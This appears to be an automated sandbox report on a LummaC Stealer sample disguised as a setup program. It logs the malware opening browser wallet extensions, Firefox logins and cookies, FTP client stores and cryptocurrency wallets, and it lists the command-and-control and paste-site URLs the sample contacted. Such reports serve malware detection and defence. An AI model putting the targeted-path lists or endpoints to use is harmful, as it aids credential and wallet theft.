Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	12 Process Injection	111 Masquerading	2 OS Credential Dumping	21 Security Software Discovery	Remote Services	11 Input Capture	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	221 Virtualization/Sandbox Evasion	11 Input Capture	3 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	12 Process Injection	Security Account Manager	221 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	31 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	13 File and Directory Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	25 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
!Setup.exe	27%	ReversingLabs	Win32.Trojan.Generic
!Setup.exe	17%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://fallyjustif.click/api	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fallyjustif.click	104.21.37.209	true	true	unknown
rentry.co	104.26.3.16	true	false	high
xhWaXURTqNAudpSlyMZZXaDi.xhWaXURTqNAudpSlyMZZXaDi	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://rentry.co/feouewe5/raw	false		high
https://fallyjustif.click/api	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://rentry.co/static/icons/512.pnghZ	powershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000049D4000.00000004.00000800.00020000.00000000.sdmp	false	high
https://rentry.co/whathZ	powershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000049D4000.00000004.00000800.00020000.00000000.sdmp	false	high
https://rentry.co/	powershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.000000000499C000.00000004.00000800.00020000.00000000.sdmp, 9OMAF2HFFRD0LNMKR.ps1.12.dr	false	high
https://rentry.co/static/icons/512.png	9OMAF2HFFRD0LNMKR.ps1.12.dr	false	high
https://rentry.co/what	powershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.000000000499C000.00000004.00000800.00020000.00000000.sdmp, 9OMAF2HFFRD0LNMKR.ps1.12.dr	false	high
https://rentry.co/hZ	powershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000049D4000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.autoitscript.com/autoit3/X	Banned.com, 0000000C.00000000.1737418139.0000000000275000.00000002.00000001.01000000.00000007.sdmp, Banned.com.1.dr, Ford.8.dr	false	high
https://aka.ms/pscore6lBkq	powershell.exe, 00000011.00000002.2437679697.0000000004661000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	!Setup.exe	false	high
https://www.autoitscript.com/autoit3/	Banned.com.1.dr, Writing.8.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000011.00000002.2437679697.0000000004661000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.teamviewer.com	!Setup.exe	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.37.209	fallyjustif.click	United States		13335	CLOUDFLARENETUS	true
104.26.3.16	rentry.co	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581738
Start date and time:	2024-12-28 21:34:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	!Setup.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@29/28@3/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 34 Number of non-executed functions: 39
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63, 172.202.163.200
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 1852 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
15:34:59	API Interceptor	1x Sleep call for process: !Setup.exe modified
15:35:40	API Interceptor	18x Sleep call for process: Banned.com modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.37.209	LL52387-01M4205301.xlsm	Get hash	malicious	IcedID	Browse	astrocycle.download/
	LL52387-01-F4448869.xlsm	Get hash	malicious	IcedID	Browse	astrocycle.download/
	Schedule-982347-Y6844315.xlsm	Get hash	malicious	IcedID	Browse	astrocycle.download/
	Vac.list07-20214862208.xlsm	Get hash	malicious	IcedID	Browse	astrocycle.download/
	HRcontacts7752205.xlsm	Get hash	malicious	IcedID	Browse	astrocycle.download/
	Formtofill4184860.xlsm	Get hash	malicious	IcedID	Browse	astrocycle.download/
	Outfordelivery799862.xlsm	Get hash	malicious	IcedID	Browse	astrocycle.download/
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	IcedID	Browse	astrocycle.download/
	DeliveryConf535215.xlsm	Get hash	malicious	IcedID	Browse	astrocycle.download/
104.26.3.16	Full-Setup.exe	Get hash	malicious	LummaC	Browse
	file.ps1	Get hash	malicious	LummaC Stealer	Browse
	grA6aqodO5.exe	Get hash	malicious	Python Stealer, CStealer	Browse
	SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe	Get hash	malicious	XWorm	Browse
	nkYzjyrKYK.exe	Get hash	malicious	Babadeda	Browse
	R6IuO0fzec.exe	Get hash	malicious	Python Stealer, CStealer	Browse
	FluxusV2.exe	Get hash	malicious	Python Stealer, CStealer	Browse
	egFMhHSlmf.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.Win64.TrojanX-gen.20834.9882.exe	Get hash	malicious	Unknown	Browse
	4wx72yFLka.exe	Get hash	malicious	Python Stealer, CStealer, Chaos	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
rentry.co	Full-Setup.exe	Get hash	malicious	LummaC	Browse	104.26.3.16
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.75.40
	taskhost.exe	Get hash	malicious	XWorm	Browse	104.26.2.16
	file.ps1	Get hash	malicious	LummaC Stealer	Browse	104.26.3.16
	bUAmCazc.ps1	Get hash	malicious	LummaC Stealer	Browse	104.26.2.16
	IaslcsMo.ps1	Get hash	malicious	LummaC Stealer	Browse	172.67.75.40
	IaslcsMo.txt.ps1	Get hash	malicious	LummaC Stealer	Browse	172.67.75.40
	owuP726k3d.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	172.67.75.40
	gkzHdqfg.ps1	Get hash	malicious	LummaC Stealer	Browse	172.67.75.40
	xaSPJNbl.ps1	Get hash	malicious	LummaC	Browse	172.67.75.40

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	ZZ2sTsJFrt.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	FB.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://prowebideas.com/dsfdgfhgdfsdfdgfhgdrwet/gdfsdfdgfhgfgdfsdfdgfh/gfsdfdgfhgfgdfsdfdgfhgdfsdfdgfh	Get hash	malicious	Unknown	Browse	104.26.9.163
	http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.87.112
	test5.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	104.21.34.5
	iien1HBbB3.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
	oe9KS7ZHUc.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	MPgkx6bQIQ.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
CLOUDFLARENETUS	ZZ2sTsJFrt.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	FB.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://prowebideas.com/dsfdgfhgdfsdfdgfhgdrwet/gdfsdfdgfhgfgdfsdfdgfh/gfsdfdgfhgfgdfsdfdgfhgdfsdfdgfh	Get hash	malicious	Unknown	Browse	104.26.9.163
	http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
